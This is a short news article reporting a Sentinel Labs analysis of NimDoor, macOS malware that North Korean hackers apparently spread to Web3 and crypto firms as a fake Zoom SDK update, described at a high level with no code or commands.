Crypto Wallets at Risk From Sophisticated North Korean Malware Masquerading as Zoom Updates

• North Korean hackers are targeting web3 firms and crypto wallets.
• DPRK hacking group Lazarus has sold over 13,000 stolen BTC since April 2025.
• North Korean hackers stole over $1.4 billion in crypto throughout 2024.

State-backed North Korean hackers are baiting Web3 and cryptocurrency firms through complex social engineering tactics to download malicious Zoom software that uses a rare coding language.

NimDoor

Hackers from the Democratic People’s Republic of Korea (DPRK) are attacking Web3 firms by posing as trusted contacts on Telegram, scheduling meetings via Calendly, and tricking victims into opening a malware-loaded “Zoom SDK update script” called a NimDoor.

It targets everything: web browser data, passwords, sensitive data, wallets, and more.

According to a report from Sentinel Labs, the hackers load a script that uses C++, AppleScript, and a rare coding language called Nim to pull in more malicious code from a fake Zoom server.

In short, the Zoom software launches an AppleScript, which delivers second-stage scripts from the remote server. This unpacks ZIP archives with codes that will begin information-stealing scripts.

Then, the C++ loader dumps more malicious code and trojans into the infected system, and harvests all the data it can.

Analysis concludes that these methods are complex and that the use of Nim makes it possible for attackers to “blend complex behavior” to serve their outcomes.

Troubles Ahead

Conclusively, analysts expect hackers to continue utilizing more obscure coding languages, especially am    ongst macOS malware authors, as they have some technical advantages and are unfamiliar to analysts.

Troublingly, it means that the companies of all shapes and sizes will need to first increase efforts to educate their staff on the dangers of social engineering and the tactics employed.

And secondly, firms will need to up their threat detection efforts to account for the myriad languages leveraged in malicious software packages.

This year, North Korean hackers stole over $1.5 billion from Bybit and have obtained much more than that from their attacks over the years.

Unfortunately, it’s a tale as old as time, and as security efforts and methods improve, so do the hackers.